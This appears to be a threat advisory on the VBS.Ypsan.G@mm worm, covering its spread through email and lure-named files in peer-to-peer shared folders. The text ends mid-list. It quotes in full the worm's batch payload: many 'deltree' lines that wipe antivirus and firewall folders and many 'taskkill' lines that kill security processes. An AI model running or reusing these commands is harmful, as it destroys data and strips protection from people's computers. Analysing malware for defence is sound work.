Ads VBS.Ypsan.G@mm Sunday, 19 June 2005 VBS.Ypsan.G@mm is a mass-mailing worm that sends itself to email addresses gathered from the Windows Address Book and also spreads through file-sharing networks. The worm deletes several files, folders, and registry entries, and attempts to shut down the compromised computer. Type: Worm Infection Length: 127,413 bytes. Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP When VBS.Yspan.G@mm is executed, it performs the following actions: Copies itself as following, if the folders exist: C:WINDOWSSytem32WINLOGON.vbs C:windowssystemporno.vbs C:VircSexy Girls.mpg.vbs C:windowssystemsystem.vbs C:windowssystemsystem32.dll C:windowssystemsys32.dll C:Program FilesKMDMy Shared FolderPorno-Pic.Jpg.vbs C:Program FilesKMDMy Shared FolderSexy girls.jpg.vbs C:Program FilesKMDMy Shared Foldergirls.mpg.vbs C:Program FilesKMDMy Shared Folder*****.Gif.vbs C:Program FilesKMDMy Shared FolderAss.Mpg.vbs C:Program FilesKaZaA LiteMy Shared FolderPorno-Pic.Jpg.vbs C:Program FilesKaZaA LiteMy Shared FolderSexy girls.jpg.vbs C:Program FilesKaZaA LiteMy Shared Foldergirls.mpg.vbs C:Program FilesKaZaA LiteMy Shared Folder*****.Gif.vbs C:Program FilesKaZaA LiteMy Shared FolderAss.Mpg.vbs C:Program FilesMorpheusMy Shared FolderPorno-Pic.Jpg.vbs C:Program FilesMorpheusMy Shared FolderSexy girls.jpg.vbs C:Program FilesMorpheusMy Shared Foldergirls.mpg.vbs C:Program FilesMorpheusMy Shared Folder*****.Gif.vbs C:Program FilesMorpheusMy Shared FolderAss.Mpg.vbs C:Program FilesBearShareSharedPorno-Pic.Jpg.vbs C:Program FilesBearShareSharedSexy girls.jpg.vbs C:Program FilesBearShareSharedgirls.mpg.vbs C:Program FilesBearShareShared*****.Gif.vbs C:Program FilesBearShareSharedAss.Mpg.vbs C:Program FilesEdonkey2000IncomingPorno-Pic.Jpg.vbs C:Program FilesEdonkey2000IncomingSexy girls.jpg.vbs C:Program FilesEdonkey2000Incominggirls.mpg.vbs C:Program FilesEdonkey2000Incoming*****.Gif.vbs C:Program FilesEdonkey2000IncomingAss.Mpg.vbs C:My DownloadsPorno-Pic.Jpg.vbs C:My DownloadsSexy girls.jpg.vbs C:My Downloadsgirls.mpg.vbs C:My Downloads*****.Gif.vbs C:My DownloadsAss.Mpg.vbs C:My Shared FolderPorno-Pic.Jpg.vbs C:My Shared FolderSexy girls.jpg.vb C:My Shared Foldergirls.mpg.vbs C:My Shared Folder*****.Gif.vbs C:My Shared FolderAss.Mpg.vbs C:Program FilesappleJuiceincomingPorno-Pic.Jpg.vbs C:Program FilesappleJuiceincomingSexy girls.jpg.vb C:Program FilesappleJuiceincominggirls.mpg.vbs C:Program FilesappleJuiceincoming*****.Gif.vbs C:Program FilesappleJuiceincomingAss.Mpg.vbs C:Program FilesGnucleusDownloadsPorno-Pic.Jpg.vbs C:Program FilesGnucleusDownloadsSexy girls.jpg.vb C:Program FilesGnucleusDownloadsgirls.mpg.vbs C:Program FilesGnucleusDownloads*****.Gif.vbs C:Program FilesGnucleusDownloadsAss.Mpg.vbs C:Program FilesGroksterMy GroksterPorno-Pic.Jpg.vbs C:Program FilesGroksterMy GroksterSexy girls.jpg.vb C:Program FilesGroksterMy Grokstergirls.mpg.vbs C:Program FilesGroksterMy Grokster*****.Gif.vbs C:Program FilesGroksterMy GroksterAss.Mpg.vbs C:Program FilesICQshared filesPorno-Pic.Jpg.vbs C:Program FilesICQshared filesSexy girls.jpg.vb C:Program FilesICQshared filesgirls.mpg.vbs C:Program FilesICQshared files*****.Gif.vbs C:Program FilesICQshared filesAss.Mpg.vbs C:Program FilesKaZaAMy Shared FolderPorno-Pic.Jpg.vbs C:Program FilesKaZaAMy Shared FolderSexy girls.jpg.vb C:Program FilesKaZaAMy Shared Foldergirls.mpg.vbs C:Program FilesKaZaAMy Shared Folder*****.Gif.vbs C:Program FilesKaZaAMy Shared FolderAss.Mpg.vbs C:Program FilesLimeWireSharedPorno-Pic.Jpg.vbs C:Program FilesLimeWireSharedSexy girls.jpg.vb C:Program FilesLimeWireSharedgirls.mpg.vbs C:Program FilesLimeWireShared*****.Gif.vbs C:Program FilesLimeWireSharedAss.Mpg.vbs C:Program FilesOvernetincomingPorno-Pic.Jpg.vbs C:Program FilesOvernetincomingSexy girls.jpg.vb C:Program FilesOvernetincominggirls.mpg.vbs C:Program FilesOvernetincoming*****.Gif.vbs C:Program FilesOvernetincomingAss.Mpg.vbs C:Program FilesShareazaDownloadsPorno-Pic.Jpg.vbs C:Program FilesShareazaDownloadsSexy girls.jpg.vb C:Program FilesShareazaDownloadsgirls.mpg.vbs C:Program FilesShareazaDownloads*****.Gif.vbs C:Program FilesShareazaDownloadsAss.Mpg.vbs C:Program FilesSwaptorDownloadPorno-Pic.Jpg.vbs C:Program FilesSwaptorDownloadSexy girls.jpg.vb C:Program FilesSwaptorDownloadgirls.mpg.vbs C:Program FilesSwaptorDownload*****.Gif.vbs C:Program FilesSwaptorDownloadAss.Mpg.vbs C:Program FilesWinMXMy Shared FolderPorno-Pic.Jpg.vbs C:Program FilesWinMXMy Shared FolderSexy girls.jpg.vb C:Program FilesWinMXMy Shared Foldergirls.mpg.vbs C:Program FilesWinMXMy Shared Folder*****.Gif.vbs C:Program FilesWinMXMy Shared FolderAss.Mpg.vbs C:Program FilesTeslaFilesPorno-Pic.Jpg.vbs C:Program FilesTeslaFilesSexy girls.jpg.vb C:Program FilesTeslaFilesgirls.mpg.vbs C:Program FilesTeslaFiles*****.Gif.vbs C:Program FilesTeslaFilesAss.Mpg.vbs C:Program FilesXoloXDownloadsPorno-Pic.Jpg.vbs C:Program FilesXoloXDownloadsSexy girls.jpg.vb C:Program FilesXoloXDownloadsgirls.mpg.vbs C:Program FilesXoloXDownloads*****.Gif.vbs C:Program FilesXoloXDownloadsAss.Mpg.vbs C:Program FilesRapigatorSharePorno-Pic.Jpg.vbs C:Program FilesRapigatorShareSexy girls.jpg.vb C:Program FilesRapigatorSharegirls.mpg.vbs C:Program FilesRapigatorShare*****.Gif.vbs C:Program FilesRapigatorShareAss.Mpg.vbs Deletes the following files to disable various programs and lower security settings: C:WindowsSystem32 askmgr.exe C:WindowsSystem32wuauclt1.exe C:WindowsSystem32wuauclt.exe C:WindowsSystem32wupdmgr.exe C:WindowsRegedit.exe C:Program FilesLavasoftAd-Aware SE Professionaldefs.ref C:Program FilesLavasoftAd-Aware SE Professionalsites.txt C:WINDOWSsystem32dumprep.exe C:WINDOWSinfmachine.inf Deletes the following folders: C:WINDOWS epair C:WINDOWSsystem32ReinstallBackups Overwrites C:autoexec.bat with the following lines to lower security settings: @deltree/y c:antiba~1*.* >nul @deltree/y c:antiba~2*.* >nul @deltree/y c:antiba~1.1*.* >nul @deltree/y c:antiba~1.2*.* >nul @deltree/y c:antiba~1.3*.* >nul @deltree/y c:antiba~1.4*.* >nul @deltree/y c:antiba~1.5*.* >nul @deltree/y c:antiba~1.6*.* >nul @deltree/y c:antiba~1.7*.* >nul @deltree/y c:antiba~1.8*.* >nul @deltree/y c:antivi~1*.* >nul @deltree/y c:antivi~2*.* >nul @deltree/y c:antiviru*.* >nul @deltree/y c:avg*.* >nul @deltree/y c:avp*.* >nul @deltree/y c:avp30*.* >nul @deltree/y c:avx*.* >nul @deltree/y c:avpers~1*.* >nul @deltree/y c:itdef~1*.* >nul @deltree/y c:itdef~2*.* >nul @deltree/y c:comman~1*.* >nul @deltree/y c:cleancih*.* >nul @deltree/y c:esafen*.* >nul @deltree/y c:findvi~1*.* >nul @deltree/y c:f-macro*.* >nul @deltree/y c:f-prot*.* >nul @deltree/y c:f-prot95*.* >nul @deltree/y c:f-secu~1*.* >nul @deltree/y c:fwin*.* >nul @deltree/y c:fwin32*.* >nul @deltree/y c:inocul~1*.* >nul @deltree/y c:inocul~2*.* >nul @deltree/y c:kasper~1*.* >nul @deltree/y c:kasper~2*.* >nul @deltree/y c:mcafee*.* >nul @deltree/y c:mcafee~1*.* >nul @deltree/y c:msav*.* >nul @deltree/y c: orman*.* >nul @deltree/y c: orton~1*.* >nul @deltree/y c: orton~2*.* >nul @deltree/y c:pav*.* >nul @deltree/y c:pccill~1*.* >nul @deltree/y c:pc-cil~1*.* >nul @deltree/y c: av*.* >nul @deltree/y c:softwin*.* >nul @deltree/y c: bav*.* >nul @deltree/y c: bavw95*.* >nul @deltree/y c: oolkit*.* >nul @deltree/y c: rendm~1*.* >nul @deltree/y c: rex*.* >nul @deltree/y c:virus*.* >nul @deltree/y c:vpc*.* >nul @deltree/y c:vs95*.* >nul @deltree/y c:zonela~1*.* >nul @deltree/y c:zonela~2*.* >nul @deltree/y c:progra~1antiba~1*.* >nul @deltree/y c:progra~1antiba~2*.* >nul @deltree/y c:progra~1antiba~1.1*.* >nul @deltree/y c:progra~1antiba~1.2*.* >nul @deltree/y c:progra~1antiba~1.3*.* >nul @deltree/y c:progra~1antiba~1.4*.* >nul @deltree/y c:progra~1antiba~1.5*.* >nul @deltree/y c:progra~1antiba~1.6*.* >nul @deltree/y c:progra~1antiba~1.7*.* >nul @deltree/y c:progra~1antiba~1.8*.* >nul @deltree/y c:progra~1antivi~1*.* >nul @deltree/y c:progra~1antivi~2*.* >nul @deltree/y c:progra~1avg*.* >nul @deltree/y c:progra~1avp*.* >nul @deltree/y c:progra~1avx*.* >nul @deltree/y c:progra~1avx2000*.* >nul @deltree/y c:progra~1avpers~1*.* >nul @deltree/y c:progra~1itdef~1*.* >nul @deltree/y c:progra~1itdef~2*.* >nul @deltree/y c:progra~1comman~1*.* >nul @deltree/y c:progra~1common~1avpsha~1*.* >nul @deltree/y c:progra~1common~1symant~1*.* >nul @deltree/y c:progra~1datafe~1*.* >nul @deltree/y c:progra~1deerfi~1.com*.* >nul @deltree/y c:progra~1f-prot*.* >nul @deltree/y c:progra~1f-prot95*.* >nul @deltree/y c:progra~1findvi~1*.* >nul @deltree/y c:progra~1f-secu~1*.* >nul @deltree/y c:progra~1f-secure*.* >nul @deltree/y c:progra~1fsi*.* >nul @deltree/y c:progra~1fwin*.* >nul @deltree/y c:progra~1fwin32*.* >nul @deltree/y c:progra~1grisoft*.* >nul @deltree/y c:progra~1inocul~1*.* >nul @deltree/y c:progra~1inocul~2*.* >nul @deltree/y c:progra~1intern~2*.* >nul @deltree/y c:progra~1kasper~1*.* >nul @deltree/y c:progra~1kasper~2*.* >nul @deltree/y c:progra~1mcafee*.* >nul @deltree/y c:progra~1mcafee~1*.* >nul @deltree/y c:progra~1mindso~1*.* >nul @deltree/y c:progra~1 orman*.* >nul @deltree/y c:progra~1 orton~1*.* >nul @deltree/y c:progra~1 orton~2*.* >nul @deltree/y c:progra~1pandas~1*.* >nul @deltree/y c:progra~1protec~1*.* >nul @deltree/y c:progra~1protec~2*.* >nul @deltree/y c:progra~1quickh~1*.* >nul @deltree/y c:progra~1 av*.* >nul @deltree/y c:progra~1signal9*.* >nul @deltree/y c:progra~1softwin*.* >nul @deltree/y c:progra~1spysto~1*.* >nul @deltree/y c:progra~1symant~1*.* >nul @deltree/y c:progra~1 bav*.* >nul @deltree/y c:progra~1 inype~1*.* >nul @deltree/y c:progra~1 rendm~1*.* >nul @deltree/y c:progra~1 rendp~1*.* >nul @deltree/y c:progra~1 rojan~1*.* >nul @deltree/y c:progra~1 rojan~2*.* >nul @deltree/y c:progra~1virusm~1.0*.* >nul @deltree/y c:progra~1zonela~1*.* >nul @deltree/y c:progra~1zonela~2*.* >nul Overwrites C:WINDOWSSystem32Taskmgr.bat with the following lines: @taskkill /IM ACKWIN32.exe /F @taskkill /IM ADAWARE.exe /F @taskkill /IM ADVXDWIN.exe /F @taskkill /IM AGENTSVR.exe /F @taskkill /IM AGENTW.exe /F @taskkill /IM ALERTSVC.exe /F @taskkill /IM ALEVIR.exe /F @taskkill /IM ALOGSERV.exe /F @taskkill /IM AMON9X.exe /F @taskkill /IM ANTI-TROJAN.exe /F @taskkill /IM ANTIVIRUS.exe /F @taskkill /IM ANTS.exe /F @taskkill /IM APIMONITOR.exe /F @taskkill /IM APLICA32.exe /F @taskkill /IM APVXDWIN.exe /F @taskkill /IM ARR.exe /F @taskkill /IM ATCON.exe /F @taskkill /IM ATGUARD.exe /F @taskkill /IM ATRO55EN.exe /F @taskkill /IM ATUPDATER.exe /F @taskkill /IM ATUPDATER.exe /F @taskkill /IM ATWATCH.exe /F @taskkill /IM AU.exe /F @taskkill /IM AUPDATE.exe /F @taskkill /IM AUPDATE.exe /F @taskkill /IM AUTODOWN.exe /F @taskkill /IM AUTODOWN.exe /F @taskkill /IM AUTOTRACE.exe /F @taskkill /IM AUTOTRACE.exe /F @taskkill /IM AUTOUPDATE.exe /F @taskkill /IM AUTOUPDATE.exe /F @taskkill /IM AVCONSOL.exe /F @taskkill /IM AVE32.exe /F @taskkill /IM AVGCC32.exe /F @taskkill /IM AVGCTRL.exe /F @taskkill /IM AVGNT.exe /F @taskkill /IM AVGSERV.exe /F @taskkill /IM AVGSERV9.exe /F @taskkill /IM AVGUARD.exe /F @taskkill /IM AVGW.exe /F @taskkill /IM AVKPOP.exe /F @taskkill /IM AVKSERV.exe /F @taskkill /IM AVKSERVICE.exe /F @taskkill /IM AVKWCTl9.exe /F @taskkill /IM AVLTMAIN.exe /F @taskkill /IM AVNT.exe /F @taskkill /IM AVP.exe /F @taskkill /IM AVP32.exe /F @taskkill /IM AVPCC.exe /F @taskkill /IM AVPDOS32.exe /F @taskkill /IM AVPM.exe /F @taskkill /IM AVPTC32.exe /F @taskkill /IM AVPUPD.exe /F @taskkill /IM AVPUPD.exe /F @taskkill /IM AVSCHED32.exe /F @taskkill /IM AVSYNMGR.exe /F @taskkill /IM AVWINNT.exe /F @taskkill /IM AVWUPD.exe /F @taskkill /IM AVWUPD32.exe /F @taskkill /IM AVWUPD32.exe /F @taskkill /IM AVWUPSRV.exe /F @taskkill /IM AVXMONITOR9X.exe /F @taskkill /IM AVXMONITORNT.exe /F @taskkill /IM AVXQUAR.exe /F @taskkill /IM AVXQUAR.exe /F @taskkill /IM BACKWEB.exe /F @taskkill /IM BARGAINS.exe /F @taskkill /IM BD_PROFESSIONAL.exe /F @taskkill /IM BEAGLE.exe /F @taskkill /IM BELT.exe /F @taskkill /IM BIDEF.exe /F @taskkill /IM BIDSERVER.exe /F @taskkill /IM BIPCP.exe /F @taskkill /IM BIPCPEVALSETUP.exe /F @taskkill /IM BISP.exe /F @taskkill /IM BLACKD.exe /F @taskkill /IM BLACKICE.exe /F @taskkill /IM BLSS.exe /F @taskkill /IM BOOTCONF.exe /F @taskkill /IM BOOTWARN.exe /F @taskkill /IM BORG2.exe /F @taskkill /IM BPC.exe /F @taskkill /IM BRASIL.exe /F @taskkill /IM BS120.exe /F @taskkill /IM BUNDLE.exe /F @taskkill /IM BVT.exe /F @taskkill /IM CCAPP.exe /F @taskkill /IM CCEVTMGR.exe /F @taskkill /IM CCPXYSVC.exe /F @taskkill /IM CDP.exe /F @taskkill /IM CFD.exe /F @taskkill /IM CFGWIZ.exe /F @taskkill /IM CFIADMIN.exe /F @taskkill /IM CFIAUDIT.exe /F @taskkill /IM CFIAUDIT.exe /F @taskkill /IM CFINET.exe /F @taskkill /IM CFINET32.exe /F @taskkill /IM CLEAN.exe /F @taskkill /IM CLEANER.exe /F @taskkill /IM CLEANER3.exe /F @taskkill /IM CLEANPC.exe /F @taskkill /IM CLICK.exe /F @taskkill /IM CMD32.exe /F @taskkill /IM CMESYS.exe /F @taskkill /IM CMGRDIAN.exe /F @taskkill /IM CMON016.exe /F @taskkill /IM CONNECTIONMONITOR.exe /F @taskkill /IM CPD.exe /F @taskkill /IM CPF9X206.exe /F @taskkill /IM CPFNT206.exe /F @taskkill /IM CTRL.exe /F @taskkill /IM CV.exe /F @taskkill /IM CWNB181.exe /F @taskkill /IM CWNTDWMO.exe /F @taskkill /IM CLAW95CF.exe /F @taskkill /IM DATEMANAGER.exe /F @taskkill /IM DCOMX.exe /F @taskkill /IM DEFALERT.exe /F @taskkill /IM DEFSCANGUI.exe /F @taskkill /IM DEFWATCH.exe /F @taskkill /IM DEPUTY.exe /F @taskkill /IM DIVX.exe /F @taskkill /IM DLLCACHE.exe /F @taskkill /IM DLLREG.exe /F @taskkill /IM DOORS.exe /F @taskkill /IM DPF.exe /F @taskkill /IM DPFSETUP.exe /F @taskkill /IM DPPS2.exe /F @taskkill /IM DRWATSON.exe /F @taskkill /IM DRWEB32.exe /F @taskkill /IM DRWEBUPW.exe /F @taskkill /IM DSSAGENT.exe /F @taskkill /IM DVP95.exe /F @taskkill /IM DVP95_0.exe /F @taskkill /IM ECENGINE.exe /F @taskkill /IM EFPEADM.exe /F @taskkill /IM EMSW.exe /F @taskkill /IM ENT.exe /F @taskkill /IM ESAFE.exe /F @taskkill /IM ESCANHNT.exe /F @taskkill /IM ESCANV95.exe /F @taskkill /IM ESPWATCH.exe /F @taskkill /IM ETHEREAL.exe /F @taskkill /IM ETRUSTCIPE.exe /F @taskkill /IM EVPN.exe /F @taskkill /IM EXANTIVIRUS-CNET.exe /F @taskkill /IM EXE.AVXW.exe /F @taskkill /IM EXPERT.exe /F @taskkill /IM EXPLORE.exe /F @taskkill /IM F-PROT.exe /F @taskkill /IM F-PROT95.exe /F @taskkill /IM F-STOPW.exe /F @taskkill /IM FAMEH32.exe /F @taskkill /IM FAST.exe /F @taskkill /IM FCH32.exe /F @taskkill /IM FIH32.exe /F @taskkill /IM FINDVIRU.exe /F @taskkill /IM FIREWALL.exe /F @taskkill /IM FNRB32.exe /F @taskkill /IM FP-WIN.exe /F @taskkill /IM FP-WIN_TRIAL.exe /F @taskkill /IM FPROT.exe /F @taskkill /IM FRW.exe /F @taskkill /IM FSAA.exe /F @taskkill /IM FSAV.exe /F @taskkill /IM FSAV32.exe /F @taskkill /IM FSAV530STBYB.exe /F @taskkill /IM FSAV530WTBYB.exe /F @taskkill /IM FSAV95.exe /F @taskkill /IM FSGK32.exe /F @taskkill /IM FSM32.exe /F @taskkill /IM FSMA32.exe /F @taskkill /IM FSMB32.exe /F @taskkill /IM GATOR.exe /F @taskkill /IM GBMENU.exe /F @taskkill /IM GBPOLL.exe /F @taskkill /IM GENERICS.exe /F @taskkill /IM GMT.exe /F @taskkill /IM GUARD.exe /F @taskkill /IM GUARDDOG.exe /F @taskkill /IM HACKTRACERSETUP.exe /F @taskkill /IM HBINST.exe /F @taskkill /IM HBSRV.exe /F @taskkill /IM HOTACTIO.exe /F @taskkill /IM HOTPATCH.exe /F @taskkill /IM HTLOG.exe /F @taskkill /IM HTPATCH.exe /F @taskkill /IM HWPE.exe /F @taskkill /IM HXDL.exe /F @taskkill /IM HXIUL.exe /F @taskkill /IM IAMAPP.exe /F @taskkill /IM IAMSERV.exe /F @taskkill /IM IAMSTATS.exe /F @taskkill /IM IBMASN.exe /F @taskkill /IM IBMAVSP.exe /F @taskkill /IM ICLOADNT.exe /F @taskkill /IM ICMON.exe /F @taskkill /IM ICSUPP95.exe /F @taskkill /IM ICSUPPNT.exe /F @taskkill /IM IDLE.exe /F @taskkill /IM IEDLL.exe /F @taskkill /IM IEDRIVER.exe /F @taskkill /IM IEXPLORER.exe /F @taskkill /IM IFACE.exe /F @taskkill /IM IFW2000.exe /F @taskkill /IM INETLNFO.exe /F @taskkill /IM INFUS.exe /F @taskkill /IM INFWIN.exe /F @taskkill /IM INIT.exe /F @taskkill /IM INTDEL.exe /F @taskkill /IM INTREN.exe /F @taskkill /IM IOMON98.exe /F @taskkill /IM ISTSVC.exe /F @taskkill /IM JAMMER.exe /F @taskkill /IM JDBGMRG.exe /F @taskkill /IM JEDI.exe /F @taskkill /IM KAVLITE40ENG.exe /F @taskkill /IM KAVPERS40ENG.exe /F @taskkill /IM KAVPF.exe /F @taskkill /IM KAZZA.exe /F @taskkill /IM KEENVALUE.exe /F @taskkill /IM KERIO-PF-213-EN-WIN.exe /F @taskkill /IM KERIO-WRL-421-EN-WIN.exe /F @taskkill /IM KERIO-WRP-421-EN-WIN.exe /F @taskkill /IM KERNEL32.exe /F @taskkill /IM KILLPROCESSSETUP161.exe /F @taskkill /IM LAUNCHER.exe /F @taskkill /IM LDNETMON.exe /F @taskkill /IM LDPRO.exe /F @taskkill /IM LDPROMENU.exe /F @taskkill /IM LDSCAN.exe /F @taskkill /IM LNETINFO.exe /F @taskkill /IM LOADER.exe /F @taskkill /IM LOCALNET.exe /F @taskkill /IM LOCKDOWN.exe /F @taskkill /IM LOCKDOWN2000.exe /F @taskkill /IM LOOKOUT.exe /F @taskkill /IM LORDPE.exe /F @taskkill /IM LSETUP.exe /F @taskkill /IM LUALL.exe /F @taskkill /IM LUALL.exe /F @taskkill /IM LUAU.exe /F @taskkill /IM LUCOMSERVER.exe /F @taskkill /IM LUINIT.exe /F @taskkill /IM LUSPT.exe /F @taskkill /IM MAPISVC32.exe /F @taskkill /IM MCAGENT.exe /F @taskkill /IM MCMNHDLR.exe /F @taskkill /IM MCSHIELD.exe /F @taskkill /IM MCTOOL.exe /F @taskkill /IM MCUPDATE.exe /F @taskkill /IM MCUPDATE.exe /F @taskkill /IM MCVSRTE.exe /F @taskkill /IM MCVSSHLD.exe /F @taskkill /IM MD.exe /F @taskkill /IM MFIN32.exe /F @taskkill /IM MFW2EN.exe /F @taskkill /IM MFWENG3.02D30.exe /F @taskkill /IM MGAVRTCL.exe /F @taskkill /IM MGAVRTE.exe /F @taskkill /IM MGHTML.exe /F @taskkill /IM MGUI.exe /F @taskkill /IM MINILOG.exe /F @taskkill /IM MMOD.exe /F @taskkill /IM MONITOR.exe /F @taskkill /IM MOOLIVE.exe /F @taskkill /IM MOSTAT.exe /F @taskkill /IM MPFAGENT.exe /F @taskkill /IM MPFSERVICE.exe /F @taskkill /IM MPFTRAY.exe /F @taskkill /IM MRFLUX.exe /F @taskkill /IM MSAPP.exe /F @taskkill /IM MSBB.exe /F @taskkill /IM MSBLAST.exe /F @taskkill /IM MSCACHE.exe /F @taskkill /IM MSCCN32.exe /F @taskkill /IM MSCMAN.exe /F @taskkill /IM MSCONFIG.exe /F @taskkill /IM MSDM.exe /F @taskkill /IM MSDOS.exe /F @taskkill /IM MSIEXEC16.exe /F @taskkill /IM MSINFO32.exe /F @taskkill /IM MSLAUGH.exe /F @taskkill /IM MSMGT.exe /F @taskkill /IM MSMSGRI32.exe /F @taskkill /IM MSSMMC32.exe /F @taskkill /IM MSSYS.exe /F @taskkill /IM MSVXD.exe /F @taskkill /IM MU0311AD.exe /F @taskkill /IM MWATCH.exe /F @taskkill /IM N32SCANW.exe /F @taskkill /IM NAV.exe /F @taskkill /IM AUTO-PROTECT.NAV80TRY.exe /F @taskkill /IM NAVAP.NAVAPSVC.exe /F @taskkill /IM NAVAPSVC.exe /F @taskkill /IM NAVAPW32.exe /F @taskkill /IM NAVDX.exe /F @taskkill /IM NAVLU32.exe /F @taskkill /IM NAVNT.exe /F @taskkill /IM NAVSTUB.exe /F @taskkill /IM NAVW32.exe /F @taskkill /IM NAVWNT.exe /F @taskkill /IM NC2000.exe /F @taskkill /IM NCINST4.exe /F @taskkill /IM NDD32.exe /F @taskkill /IM NEOMONITOR.exe /F @taskkill /IM NEOWATCHLOG.exe /F @taskkill /IM NETARMOR.exe /F @taskkill /IM NETD32.exe /F @taskkill /IM NETINFO.exe /F @taskkill /IM NETMON.exe /F @taskkill /IM NETSCANPRO.exe /F @taskkill /IM NETSPYHUNTER-1.2.exe /F @taskkill /IM NETSTAT.exe /F @taskkill /IM NETUTILS.exe /F @taskkill /IM NISSERV.exe /F @taskkill /IM NISUM.exe /F @taskkill /IM NMAIN.exe /F @taskkill /IM NOD32.exe /F @taskkill /IM NORMIST.exe /F @taskkill /IM NORTON_INTERNET_SECU_3.0_407.exe /F @taskkill /IM NOTSTART.exe /F @taskkill /IM NPF40_TW_98_NT_ME_2K.exe /F @taskkill /IM NPFMESSENGER.exe /F @taskkill /IM NPROTECT.exe /F @taskkill /IM NPSCHECK.exe /F @taskkill /IM NPSSVC.exe /F @taskkill /IM NSCHED32.exe /F @taskkill /IM NSSYS32.exe /F @taskkill /IM NSTASK32.exe /F @taskkill /IM NSUPDATE.exe /F @taskkill /IM NT.exe /F @taskkill /IM NTRTSCAN.exe /F @taskkill /IM NTVDM.exe /F @taskkill /IM NTXconfig.exe /F @taskkill /IM NUI.exe /F @taskkill /IM NUPGRADE.exe /F @taskkill /IM NUPGRADE.exe /F @taskkill /IM NVARCH16.exe /F @taskkill /IM NVC95.exe /F @taskkill /IM NVSVC32.exe /F @taskkill /IM NWINST4.exe /F @taskkill /IM NWSERVICE.exe /F @taskkill /IM NWTOOL16.exe /F @taskkill /IM OLLYDBG.exe /F @taskkill /IM ONSRVR.exe /F @taskkill /IM OPTIMIZE.exe /F @taskkill /IM OSTRONET.exe /F @taskkill /IM OTFIX.exe /F @taskkill /IM OUTPOST.exe /F @taskkill /IM OUTPOST.exe /F @taskkill /IM OUTPOSTINSTALL.exe /F @taskkill /IM OUTPOSTPROINSTALL.exe /F @taskkill /IM PADMIN.exe /F @taskkill /IM PANIXK.exe /F @taskkill /IM PATCH.exe /F @taskkill /IM PAVCL.exe /F @taskkill /IM PAVPROXY.exe /F @taskkill /IM PAVSCHED.exe /F @taskkill /IM PAVW.exe /F @taskkill /IM PCFWALLICON.exe /F @taskkill /IM PCIP10117_0.exe /F @taskkill /IM PCSCAN.exe /F @taskkill /IM PDSETUP.exe /F @taskkill /IM PERISCOPE.exe /F @taskkill /IM PERSFW.exe /F @taskkill /IM PERSWF.exe /F @taskkill /IM PF2.exe /F @taskkill /IM PFWADMIN.exe /F @taskkill /IM PGMONITR.exe /F @taskkill /IM PINGSCAN.exe /F @taskkill /IM PLATIN.exe /F @taskkill /IM POP3TRAP.exe /F @taskkill /IM POPROXY.exe /F @taskkill /IM POPSCAN.exe /F @taskkill /IM PORTDETECTIVE.exe /F @taskkill /IM PORTMONITOR.exe /F @taskkill /IM POWERSCAN.exe /F @taskkill /IM PPINUPDT.exe /F @taskkill /IM PPTBC.exe /F @taskkill /IM PPVSTOP.exe /F @taskkill /IM PRIZESURFER.exe /F @taskkill /IM PRMT.exe /F @taskkill /IM PRMVR.exe /F @taskkill /IM PROCDUMP.exe /F @taskkill /IM PROCESSMONITOR.exe /F @taskkill /IM PROCEXPLORERV1.0.exe /F @taskkill /IM PROGRAMAUDITOR.exe /F @taskkill /IM PROPORT.exe /F @taskkill /IM PROTECTX.exe /F @taskkill /IM PSPF.exe /F @taskkill /IM PURGE.exe /F @taskkill /IM QCONSOLE.exe /F @taskkill /IM QSERVER.exe /F @taskkill /IM RAPAPP.exe /F @taskkill /IM RAV7.exe /F @taskkill /IM RAV7WIN.exe /F @taskkill /IM RAV8WIN32ENG.exe /F @taskkill /IM RAY.exe /F @taskkill /IM RB32.exe /F @taskkill /IM RCSYNC.exe /F @taskkill /IM REALMON.exe /F @taskkill /IM REGED.exe /F @taskkill /IM REGEDIT.exe /F @taskkill /IM REGEDT32.exe /F @taskkill /IM RESCUE.exe /F @taskkill /IM RESCUE32.exe /F @taskkill /IM RRGUARD.exe /F @taskkill /IM RSHELL.exe /F @taskkill /IM RTVSCAN.exe /F @taskkill /IM RTVSCN95.exe /F @taskkill /IM RULAUNCH.exe /F @taskkill /IM RUN32DLL.exe /F @taskkill /IM RUNDLL.exe /F @taskkill /IM RUNDLL16.exe /F @taskkill /IM RUXDLL32.exe /F @taskkill /IM SAFEWEB.exe /F @taskkill /IM SAHAGENT.exe /F @taskkill /IM SAVE.exe /F @taskkill /IM SAVENOW.exe /F @taskkill /IM SBSERV.exe /F @taskkill /IM SC.exe /F @taskkill /IM SCAM32.exe /F @taskkill /IM SCAN32.exe /F @taskkill /IM SCAN95.exe /F @taskkill /IM SCANPM.exe /F @taskkill /IM SCRSCAN.exe /F @taskkill /IM SETUPVAMEEVAL.exe /F @taskkill /IM SETUP_FLOWPROTECTOR_US.exe /F @taskkill /IM SFC.exe /F @taskkill /IM SGSSFW32.exe /F @taskkill /IM SH.exe /F @taskkill /IM SHELLSPYINSTALL.exe /F @taskkill /IM SHN.exe /F @taskkill /IM SHOWBEHIND.exe /F @taskkill /IM SMC.exe /F @taskkill /IM SMS.exe /F @taskkill /IM SMSS32.exe /F @taskkill /IM SOAP.exe /F @taskkill /IM SOFI.exe /F @taskkill /IM SPERM.exe /F @taskkill /IM SPF.exe /F @taskkill /IM SPHINX.exe /F @taskkill /IM SPOLER.exe /F @taskkill /IM SPOOLCV.exe /F @taskkill /IM SPOOLSV32.exe /F @taskkill /IM SPYXX.exe /F @taskkill /IM SREXE.exe /F @taskkill /IM SRNG.exe /F @taskkill /IM SS3EDIT.exe /F @taskkill /IM SSGRATE.exe /F @taskkill /IM SSG_4104.exe /F @taskkill /IM ST2.exe /F @taskkill /IM START.exe /F @taskkill /IM STCLOADER.exe /F @taskkill /IM SUPFTRL.exe /F @taskkill /IM SUPPORT.exe /F @taskkill /IM SUPPORTER5.exe /F @taskkill /IM SVC.exe /F @taskkill /IM SVCHOSTC.exe /F @taskkill /IM SVCHOSTS.exe /F @taskkill /IM SVSHOST.exe /F @taskkill /IM SWEEP95.exe /F @taskkill /IM SWEEPNET.SWEEPSRV.SYS.SWNETSUP.exe /F @taskkill /IM SYMPROXYSVC.exe /F @taskkill /IM SYMTRAY.exe /F @taskkill /IM SYSEDIT.exe /F @taskkill /IM SYSTEM.exe /F @taskkill /IM SYSTEM32.exe /F @taskkill /IM SYSUPD.exe /F @taskkill /IM TASKMG.exe /F @taskkill /IM TASKMO.exe /F @taskkill /IM TASKMON.exe /F @taskkill /IM TAUMON.exe /F @taskkill /IM TBSCAN.exe /F @taskkill /IM 